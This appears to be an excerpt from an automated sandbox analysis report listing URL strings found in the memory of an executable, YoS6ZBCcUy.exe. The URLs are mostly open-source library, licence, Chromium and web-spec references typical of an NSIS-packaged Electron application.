Source: YoS6ZBCcUy.exe, 00000000.00000003.1934412371.00000000052B0000.00000004.00001000.00020000.00000000.sdmp, YoS6ZBCcUy.exe, 00000000.00000003.2088531041.0000000004755000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://code.google.com/p/python-gflags/
Source: YoS6ZBCcUy.exe, 00000000.00000003.1934412371.00000000052B0000.00000004.00001000.00020000.00000000.sdmp, YoS6ZBCcUy.exe, 00000000.00000003.2088531041.0000000004755000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://code.google.com/p/smhasher/
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077850274.00000000065A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077850274.00000000065A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/COMODOCertificationAuthority.crl0
Source: YoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://demon.tw/my-work/vbs-json.html
Source: YoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://feross.org
Source: YoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://fresc81.github.io/node-winreg
Source: YoS6ZBCcUy.exe, 00000000.00000003.1934412371.00000000052B0000.00000004.00001000.00020000.00000000.sdmp, YoS6ZBCcUy.exe, 00000000.00000003.2088531041.0000000004755000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://git.linuxtv.org/v4l-utils.git
Source: YoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://github.com/troygoode/)
Source: YoS6ZBCcUy.exe, 00000000.00000003.1934412371.00000000052B0000.00000004.00001000.00020000.00000000.sdmp, YoS6ZBCcUy.exe, 00000000.00000003.2088531041.0000000004755000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://google.github.io/snappy/
Source: YoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://juliangruber.com
Source: YoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://n8.io/)
Source: YoS6ZBCcUy.exe, 00000000.00000000.1820111362.000000000040A000.00000008.00000001.01000000.00000003.sdmp, YoS6ZBCcUy.exe, 00000000.00000002.2197910663.000000000040A000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: YoS6ZBCcUy.exe, 00000000.00000003.1934412371.00000000052B0000.00000004.00001000.00020000.00000000.sdmp, YoS6ZBCcUy.exe, 00000000.00000003.2088531041.0000000004755000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://opensource.perlig.de/rjsmin/
Source: YoS6ZBCcUy.exe, 00000000.00000003.1934412371.00000000052B0000.00000004.00001000.00020000.00000000.sdmp, YoS6ZBCcUy.exe, 00000000.00000003.2088531041.0000000004755000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://source.android.com/
Source: YoS6ZBCcUy.exe, 00000000.00000003.1934412371.00000000052B0000.00000004.00001000.00020000.00000000.sdmp, YoS6ZBCcUy.exe, 00000000.00000003.2088531041.0000000004755000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://source.android.com/compatibility)
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmp, YoS6ZBCcUy.exe, 00000000.00000003.2077850274.00000000065A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://src.chromium.org/viewvc/blink/trunk/Source/devtools/front_end/SourceMap.js
Source: YoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://stackoverflow.com/a/1068308/13216
Source: YoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://stackoverflow.com/questions/8840343/how-to-read-the-default-value-from-registry-in-vbscript
Source: YoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://substack.net
Source: YoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://travis-ci.org/troygoode/node-require-directory)
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://userguide.icu-project.org/strings/properties
Source: YoS6ZBCcUy.exe, 00000000.00000003.1934412371.00000000052B0000.00000004.00001000.00020000.00000000.sdmp, YoS6ZBCcUy.exe, 00000000.00000003.2088531041.0000000004755000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/
Source: YoS6ZBCcUy.exe, 00000000.00000003.1934412371.00000000052B0000.00000004.00001000.00020000.00000000.sdmp, YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmp, YoS6ZBCcUy.exe, 00000000.00000003.2088531041.0000000004755000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: YoS6ZBCcUy.exe, 00000000.00000003.1934412371.00000000052B0000.00000004.00001000.00020000.00000000.sdmp, YoS6ZBCcUy.exe, 00000000.00000003.2088531041.0000000004755000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.apple.com/legal/guidelinesfor3rdparties.html.
Source: YoS6ZBCcUy.exe, 00000000.00000003.1934412371.00000000052B0000.00000004.00001000.00020000.00000000.sdmp, YoS6ZBCcUy.exe, 00000000.00000003.2088531041.0000000004755000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.ecma-international.org/memento/codeofconduct.htm
Source: YoS6ZBCcUy.exe, 00000000.00000003.1934412371.00000000052B0000.00000004.00001000.00020000.00000000.sdmp, YoS6ZBCcUy.exe, 00000000.00000003.2088531041.0000000004755000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.finesse.demon.co.uk/steven/sqrt.html.
Source: YoS6ZBCcUy.exe, 00000000.00000003.1934412371.00000000052B0000.00000004.00001000.00020000.00000000.sdmp, YoS6ZBCcUy.exe, 00000000.00000003.2088531041.0000000004755000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.freedesktop.org/wiki/Software/xdg-user-dirs
Source: YoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.futurealoof.com)
Source: YoS6ZBCcUy.exe, 00000000.00000003.1934412371.00000000052B0000.00000004.00001000.00020000.00000000.sdmp, YoS6ZBCcUy.exe, 00000000.00000003.2088531041.0000000004755000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.gutenberg.org/ebooks/53).
Source: YoS6ZBCcUy.exe, 00000000.00000003.1934412371.00000000052B0000.00000004.00001000.00020000.00000000.sdmp, YoS6ZBCcUy.exe, 00000000.00000003.2088531041.0000000004755000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.linux-usb.org/usb-ids.html
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.midnight-commander.org/browser/lib/tty/key.c
Source: YoS6ZBCcUy.exe, 00000000.00000003.1934412371.00000000052B0000.00000004.00001000.00020000.00000000.sdmp, YoS6ZBCcUy.exe, 00000000.00000003.2088531041.0000000004755000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.mozilla.org/MPL/
Source: YoS6ZBCcUy.exe, 00000000.00000003.1934412371.00000000052B0000.00000004.00001000.00020000.00000000.sdmp, YoS6ZBCcUy.exe, 00000000.00000003.2088531041.0000000004755000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.opensource.apple.com/apsl/
Source: YoS6ZBCcUy.exe, 00000000.00000003.1934412371.00000000052B0000.00000004.00001000.00020000.00000000.sdmp, YoS6ZBCcUy.exe, 00000000.00000003.2088531041.0000000004755000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.opensource.org/licenses/bsd-license.php
Source: YoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.opensource.org/licenses/mit-license.php)
Source: YoS6ZBCcUy.exe, 00000000.00000003.1934412371.00000000052B0000.00000004.00001000.00020000.00000000.sdmp, YoS6ZBCcUy.exe, 00000000.00000003.2088531041.0000000004755000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.pertinentdetail.org/sqrt
Source: YoS6ZBCcUy.exe, 00000000.00000003.1934412371.00000000052B0000.00000004.00001000.00020000.00000000.sdmp, YoS6ZBCcUy.exe, 00000000.00000003.2088531041.0000000004755000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.ploscompbiol.org/static/license
Source: YoS6ZBCcUy.exe, 00000000.00000003.1934412371.00000000052B0000.00000004.00001000.00020000.00000000.sdmp, YoS6ZBCcUy.exe, 00000000.00000003.2088531041.0000000004755000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.polymer-project.org
Source: YoS6ZBCcUy.exe, 00000000.00000003.1934412371.00000000052B0000.00000004.00001000.00020000.00000000.sdmp, YoS6ZBCcUy.exe, 00000000.00000003.2088531041.0000000004755000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.portaudio.com
Source: YoS6ZBCcUy.exe, 00000000.00000003.1934412371.00000000052B0000.00000004.00001000.00020000.00000000.sdmp, YoS6ZBCcUy.exe, 00000000.00000003.2088531041.0000000004755000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.softsynth.com
Source: YoS6ZBCcUy.exe, 00000000.00000003.1951975329.00000000052B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.sysinternals.com
Source: YoS6ZBCcUy.exe, 00000000.00000003.1951975329.00000000052B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.sysinternals.comWindowPositionSOFTWARE
Source: YoS6ZBCcUy.exe, 00000000.00000003.1934412371.00000000052B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.unicode.org/copyright.html
Source: YoS6ZBCcUy.exe, 00000000.00000003.1934412371.00000000052B0000.00000004.00001000.00020000.00000000.sdmp, YoS6ZBCcUy.exe, 00000000.00000003.2088531041.0000000004755000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.webrtc.org
Source: YoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.youtube.com/watch?v=I9nDOSGfwZg
Source: YoS6ZBCcUy.exe, 00000000.00000003.1934412371.00000000052B0000.00000004.00001000.00020000.00000000.sdmp, YoS6ZBCcUy.exe, 00000000.00000003.2088531041.0000000004755000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://zlib.net/
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077850274.00000000065A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://%s:%d/.well-known/masque/udp/%s/%d/
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077850274.00000000065A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://%s:%d/.well-known/masque/udp/%s/%d/Net.QuicStreamFactory.DefaultNetworkMatchNet.QuicSession.
Source: YoS6ZBCcUy.exe, 00000000.00000003.1934412371.00000000052B0000.00000004.00001000.00020000.00000000.sdmp, YoS6ZBCcUy.exe, 00000000.00000003.2088531041.0000000004755000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://android.googlesource.com/platform/external/puffin
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077850274.00000000065A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://blog.chromium.org/2019/10/no-more-mixed-messages-about-https.html
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077850274.00000000065A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://blog.chromium.org/2019/10/no-more-mixed-messages-about-https.htmlMixed
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077850274.00000000065A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://chromestatus.com/feature/5105856067141632.
Source: YoS6ZBCcUy.exe, 00000000.00000003.1934412371.00000000052B0000.00000004.00001000.00020000.00000000.sdmp, YoS6ZBCcUy.exe, 00000000.00000003.2078169826.00000000069A3000.00000004.00001000.00020000.00000000.sdmp, YoS6ZBCcUy.exe, 00000000.00000003.2088531041.0000000004755000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://chromium.googlesource.com/chromium/src/
Source: YoS6ZBCcUy.exe, 00000000.00000003.1934412371.00000000052B0000.00000004.00001000.00020000.00000000.sdmp, YoS6ZBCcUy.exe, 00000000.00000003.2088531041.0000000004755000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://chromium.googlesource.com/external/github.com/intel/tinycbor.git
Source: YoS6ZBCcUy.exe, 00000000.00000003.1934412371.00000000052B0000.00000004.00001000.00020000.00000000.sdmp, YoS6ZBCcUy.exe, 00000000.00000003.2088531041.0000000004755000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://chromium.googlesource.com/vulkan-deps/
Source: YoS6ZBCcUy.exe, 00000000.00000003.1934412371.00000000052B0000.00000004.00001000.00020000.00000000.sdmp, YoS6ZBCcUy.exe, 00000000.00000003.2088531041.0000000004755000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://chromium.googlesource.com/webm/libwebm
Source: YoS6ZBCcUy.exe, 00000000.00000003.1934412371.00000000052B0000.00000004.00001000.00020000.00000000.sdmp, YoS6ZBCcUy.exe, 00000000.00000003.2088531041.0000000004755000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://chromium.googlesource.com/webm/libwebp
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077850274.00000000065A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://code.google.com/p/chromium/issues/detail?id=25916
Source: YoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://code.google.com/p/v8/wiki/JavaScriptStackTraceApi
Source: YoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://codereview.chromium.org/121173009/
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://console.spec.whatwg.org/#clear
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://console.spec.whatwg.org/#console-namespace
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://console.spec.whatwg.org/#count
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://console.spec.whatwg.org/#count-map
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://console.spec.whatwg.org/#countreset
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://console.spec.whatwg.org/#table
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077850274.00000000065A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://crbug.com/1038223.
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077850274.00000000065A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://crbug.com/927119
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077850274.00000000065A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://crbug.com/927119Blink.Script.SchedulingTypeScriptLoader
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077850274.00000000065A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://crbug.com/981419
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://crbug.com/v8/7848
Source: YoS6ZBCcUy.exe, 00000000.00000003.1934412371.00000000052B0000.00000004.00001000.00020000.00000000.sdmp, YoS6ZBCcUy.exe, 00000000.00000003.2088531041.0000000004755000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://creativecommons.org/licenses/by/3.0/
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://cs.chromium.org/chromium/src/v8/tools/SourceMap.js?rcl=dd10454c1d
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://datatracker.ietf.org/doc/html/rfc7231#section-6.4
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://datatracker.ietf.org/doc/html/rfc7238
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077850274.00000000065A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://developer.chrome.com/blog/enabling-shared-array-buffer/
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077850274.00000000065A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://developer.chrome.com/docs/extensions/mv3/cross-origin-isolation/.
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/API/PerformanceResourceTiming
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/JavaScript/Equality_comparisons_and_sameness#Loose_equa
Source: YoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/String/endsWith
Source: YoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/String/includes
Source: YoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/String/startsWith
Source: YoS6ZBCcUy.exe, 00000000.00000003.1934412371.00000000052B0000.00000004.00001000.00020000.00000000.sdmp, YoS6ZBCcUy.exe, 00000000.00000003.2088531041.0000000004755000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://developers.google.com/android/guides/setup
Source: YoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/d/17aTgLnjMXIrfjgNaTUnHQO7m3xgzHR2VXBTmi03Qii4/
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://dom.spec.whatwg.org/#dom-event-stopimmediatepropagation
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://dom.spec.whatwg.org/#interface-abortcontroller
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://dom.spec.whatwg.org/#interface-eventtarget
Source: YoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://domenic.me/)
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://encoding.spec.whatwg.org
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://encoding.spec.whatwg.org/#encode-and-enqueue-a-chunk
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://encoding.spec.whatwg.org/#encode-and-flush
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://encoding.spec.whatwg.org/#textdecoder
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://encoding.spec.whatwg.org/#textencoder
Source: YoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://feross.org
Source: YoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://feross.org/opensource
Source: YoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://feross.org/support
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://fetch.spec.whatwg.org/
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://fetch.spec.whatwg.org/#fetch-method
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://fetch.spec.whatwg.org/#fetch-timing-info
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://fetch.spec.whatwg.org/#headers-class
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://fetch.spec.whatwg.org/#request-class
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://fetch.spec.whatwg.org/#response-class
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://gist.github.com/XVilka/8346728#gistcomment-2823421
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/ChromeDevTools/devtools-frontend/blob/4275917f84266ef40613db3c1784a25f902ea74e/fr
Source: YoS6ZBCcUy.exe, 00000000.00000003.1934412371.00000000052B0000.00000004.00001000.00020000.00000000.sdmp, YoS6ZBCcUy.exe, 00000000.00000003.2088531041.0000000004755000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Cyan4973/xxHash
Source: YoS6ZBCcUy.exe, 00000000.00000003.1934412371.00000000052B0000.00000004.00001000.00020000.00000000.sdmp, YoS6ZBCcUy.exe, 00000000.00000003.2088531041.0000000004755000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/GPUOpen-LibrariesAndSDKs/VulkanMemoryAllocator
Source: YoS6ZBCcUy.exe, 00000000.00000003.1934412371.00000000052B0000.00000004.00001000.00020000.00000000.sdmp, YoS6ZBCcUy.exe, 00000000.00000003.2088531041.0000000004755000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/GoogleChrome/web-vitals
Source: YoS6ZBCcUy.exe, 00000000.00000003.1934412371.00000000052B0000.00000004.00001000.00020000.00000000.sdmp, YoS6ZBCcUy.exe, 00000000.00000003.2088531041.0000000004755000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/GoogleChromeLabs/text-fragments-polyfill
Source: YoS6ZBCcUy.exe, 00000000.00000003.1934412371.00000000052B0000.00000004.00001000.00020000.00000000.sdmp, YoS6ZBCcUy.exe, 00000000.00000003.2088531041.0000000004755000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/KhronosGroup/SPIRV-Headers
Source: YoS6ZBCcUy.exe, 00000000.00000003.1934412371.00000000052B0000.00000004.00001000.00020000.00000000.sdmp, YoS6ZBCcUy.exe, 00000000.00000003.2088531041.0000000004755000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/KhronosGroup/SPIRV-Headers.git
Source: YoS6ZBCcUy.exe, 00000000.00000003.1934412371.00000000052B0000.00000004.00001000.00020000.00000000.sdmp, YoS6ZBCcUy.exe, 00000000.00000003.2088531041.0000000004755000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/KhronosGroup/SPIRV-Tools
Source: YoS6ZBCcUy.exe, 00000000.00000003.1934412371.00000000052B0000.00000004.00001000.00020000.00000000.sdmp, YoS6ZBCcUy.exe, 00000000.00000003.2088531041.0000000004755000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/KhronosGroup/SPIRV-Tools.git
Source: YoS6ZBCcUy.exe, 00000000.00000003.1934412371.00000000052B0000.00000004.00001000.00020000.00000000.sdmp, YoS6ZBCcUy.exe, 00000000.00000003.2088531041.0000000004755000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/KhronosGroup/Vulkan-Headers
Source: YoS6ZBCcUy.exe, 00000000.00000003.1934412371.00000000052B0000.00000004.00001000.00020000.00000000.sdmp, YoS6ZBCcUy.exe, 00000000.00000003.2088531041.0000000004755000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/KhronosGroup/Vulkan-Loader
Source: YoS6ZBCcUy.exe, 00000000.00000003.1934412371.00000000052B0000.00000004.00001000.00020000.00000000.sdmp, YoS6ZBCcUy.exe, 00000000.00000003.2088531041.0000000004755000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Maratyszcza/pthreadpool
Source: YoS6ZBCcUy.exe, 00000000.00000003.1934412371.00000000052B0000.00000004.00001000.00020000.00000000.sdmp, YoS6ZBCcUy.exe, 00000000.00000003.2088531041.0000000004755000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Nicoshev/rapidhash
Source: YoS6ZBCcUy.exe, 00000000.00000003.1934412371.00000000052B0000.00000004.00001000.00020000.00000000.sdmp, YoS6ZBCcUy.exe, 00000000.00000003.2088531041.0000000004755000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Nicoshev/rapidhash/blob/master/rapidhash.h
Source: YoS6ZBCcUy.exe, 00000000.00000003.1934412371.00000000052B0000.00000004.00001000.00020000.00000000.sdmp, YoS6ZBCcUy.exe, 00000000.00000003.2088531041.0000000004755000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/PortAudio/portaudio/tree/master/src/common
Source: YoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/Raynos/xtend
Source: YoS6ZBCcUy.exe, 00000000.00000003.1934412371.00000000052B0000.00000004.00001000.00020000.00000000.sdmp, YoS6ZBCcUy.exe, 00000000.00000003.2088531041.0000000004755000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/ReactiveX/rxjs
Source: YoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/RyanZim/universalify#readme
Source: YoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/RyanZim/universalify.git
Source: YoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/STRML/async-limiter
Source: YoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/Sebmaster/tr46.js#readme
Source: YoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/Sebmaster/tr46.js.git
Source: YoS6ZBCcUy.exe, 00000000.00000003.1934412371.00000000052B0000.00000004.00001000.00020000.00000000.sdmp, YoS6ZBCcUy.exe, 00000000.00000003.2088531041.0000000004755000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/SeleniumHQ/selenium/tree/trunk
Source: YoS6ZBCcUy.exe, 00000000.00000003.1934412371.00000000052B0000.00000004.00001000.00020000.00000000.sdmp, YoS6ZBCcUy.exe, 00000000.00000003.2088531041.0000000004755000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Squirrel/Squirrel.Mac
Source: YoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/TooTallNate/util-deprecate
